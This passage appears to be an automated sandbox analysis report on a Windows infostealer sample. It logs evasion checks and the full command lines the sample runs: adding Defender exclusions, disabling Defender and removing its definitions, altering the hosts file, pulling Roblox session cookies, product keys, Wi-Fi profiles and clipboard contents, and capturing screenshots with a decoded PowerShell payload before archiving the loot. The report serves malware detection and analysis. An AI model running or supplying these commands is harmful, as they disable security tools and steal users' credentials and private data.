              Source: getmac.exe, 00000042.00000003.1833496519.000001556908B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000003.1833684929.000001556909F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000002.1834820672.00000155690B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmusrvc
              Source: getmac.exe, 00000042.00000003.1833496519.000001556908B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000002.1834820672.00000155690D1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000003.1833659004.00000155690CF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: kfvboxservice(
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmtoolsd
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: fvmwareuser
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwareservice
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\program.exe | Code function: 0_2_00007FF6B750D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6B750D12C
              Source: C:\Users\user\Desktop\program.exe | Code function: 1_2_00007FFDFAF10350 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFAF10350
              Source: C:\Users\user\Desktop\program.exe | Code function: 0_2_00007FF6B7523480 GetProcessHeap,0_2_00007FF6B7523480
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
              Source: C:\Users\user\Desktop\program.exe | Code function: 0_2_00007FF6B750C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6B750C8A0
              Source: C:\Users\user\Desktop\program.exe | Code function: 0_2_00007FF6B750D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6B750D12C
              Source: C:\Users\user\Desktop\program.exe | Code function: 0_2_00007FF6B751A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6B751A614
              Source: C:\Users\user\Desktop\program.exe | Code function: 0_2_00007FF6B750D30C SetUnhandledExceptionFilter,0_2_00007FF6B750D30C
              Source: C:\Users\user\Desktop\program.exe | Code function: 1_2_00007FF6B750C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF6B750C8A0
              Source: C:\Users\user\Desktop\program.exe | Code function: 1_2_00007FF6B750D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6B750D12C
              Source: C:\Users\user\Desktop\program.exe | Code function: 1_2_00007FF6B751A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6B751A614
              Source: C:\Users\user\Desktop\program.exe | Code function: 1_2_00007FF6B750D30C SetUnhandledExceptionFilter,1_2_00007FF6B750D30C
              Source: C:\Users\user\Desktop\program.exe | Code function: 1_2_00007FFDFAE63248 IsProcessorFeaturePresent,00007FFE1A461A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE1A461A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFAE63248
              Source: C:\Users\user\Desktop\program.exe | Code function: 1_2_00007FFE0076212B IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE0076212B
              Source: C:\Users\user\Desktop\program.exe | Code function: 1_2_00007FFE00761CB7 SetUnhandledExceptionFilter,1_2_00007FFE00761CB7
              Source: C:\Users\user\Desktop\program.exe | Code function: 1_2_00007FFE007DDFFC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE007DDFFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe | Code function: 83_2_00007FF64FEB4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,83_2_00007FF64FEB4C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe | Code function: 83_2_00007FF64FEAB6D8 SetUnhandledExceptionFilter,83_2_00007FF64FEAB6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe | Code function: 83_2_00007FF64FEAA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,83_2_00007FF64FEAA66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe | Code function: 83_2_00007FF64FEAB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,83_2_00007FF64FEAB52C

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\program.exeFile written: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Users\user\Desktop\program.exe "C:\Users\user\Desktop\program.exe"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQBzAHUAbAB0AHMALgBBAGQAZAAoACgAQgBpAHQAbQBhAHAAKQBiAGkAdABtAGEAcAAuAEMAbABvAG4AZQAoACkAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAAgACgARQB4AGMAZQBwAHQAaQBvAG4AKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAvAC8AIABIAGEAbgBkAGwAZQAgAGEAbgB5ACAAZQB4AGMAZQBwAHQAaQBvAG4AcwAgAGgAZQByAGUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAcgBlAHMAdQBsAHQAcwA7AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKACIAQAANAAoADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzAG8AdQByAGMAZQAgAC0AUgBlAGYAZQByAGUAbgBjAGUAZABBAHMAcwBlAG0AYgBsAGkAZQBzACAAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES93BE.tmp" "c:\Users\user\AppData\Local\Temp\tgmup5d5\CSC93ACBC84BC674220B3501D9F22ECFDE.TMP"
              Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe  Process created: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *
              Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\program.exe  Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\program.exe  Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmag